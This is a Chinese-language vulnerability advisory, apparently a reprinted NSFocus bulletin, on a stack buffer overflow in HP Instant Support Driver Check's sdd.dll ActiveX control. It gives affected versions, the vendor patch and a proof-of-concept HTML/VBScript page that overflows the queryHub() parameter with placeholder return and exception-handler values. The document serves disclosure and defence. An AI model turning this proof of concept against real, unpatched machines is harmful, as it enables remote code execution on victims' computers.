作家
登录

HP即时支持驱动程序检查sdd.dll栈缓冲区溢出漏洞

作者: 来源: 2012-06-12 22:22:41 阅读 我要评论

发布日期:2007-07-02
更新日期:2007-07-04

受影响系统:
HP Instant Support - Driver Check < v1.5.0.3
- Microsoft Windows XP SP2
不受影响系统:
HP Instant Support - Driver Check v1.5.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 24730

惠普即时支持驱动程序检测(HP Instant Support Driver Check)功能可帮助客户确定他们是否正在使用最新的打印驱动程序。

HP即时支持驱动程序检查sdd.dll处理参数数据时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。

运行在Windows XP平台上的HP即时支持驱动程序检测(sdd.dll,CLSID为156BF4B7-AE3A-4365-BD88-95A75AF8F09D)没有正确地验证传送给queryHub()方式的参数。如果用户受骗访问了恶意站点并向该方式传送了超过226字节的超长参数的话,就可能触发栈溢出,导致执行任意指令。

<*来源:shinnai (shinnai@autistici.org)

链接:http://secunia.com/advisories/25918/
http://marc.info/?l=bugtraq&m=118347899926354&w=2
http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Exploits&argument=Remote&topic=118336
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?print=true&objectID=c01077597&printver
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<object classid='clsid:156BF4B7-AE3A-4365-BD88-95A75AF8F09D' id='test'></object>
<script language = 'vbscript'>

buff             = String(222, "A")

get_EBP          = "cccc"

get_EIP          = unescape("aaaa")

buf1             = unescape("bbbb")

second_exception = unescape("%00%00%92%00")

first_exception  = unescape("%00%00%92%00")

buf2             = String(4000, "B")

egg              = buff + get_EBP + get_EIP + buf1 + second_exception + first_exception + buf2

test.queryHub egg

</script>
</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

HP
--
HP已经为此发布了一个安全公告(HPSBPI02228)以及相应补丁:
HPSBPI02228:SSRT071404 rev.1 - HP Instant Support - Driver Check Running on Windows XP, Remote Unauthorized Access
链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?print=true&objectID=c01077597&printver
【绿盟授权51CTO.COM 独家报道,未经书面许可不得转载!】


  推荐阅读

  IBM Lotus Notes出现远程栈溢出漏洞 官方补丁已发

发布日期:2007-10-24 更新日期:2007-10-25受影响系统: IBM Lotus Notes 8.0 IBM Lotus Notes 7.0 IBM Lotus Notes 6.5 描述: ------------------------------------------------------------------------->>>详细阅读


本文标题:HP即时支持驱动程序检查sdd.dll栈缓冲区溢出漏洞

地址:http://www.17bianji.com/anquan/buding/2589.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)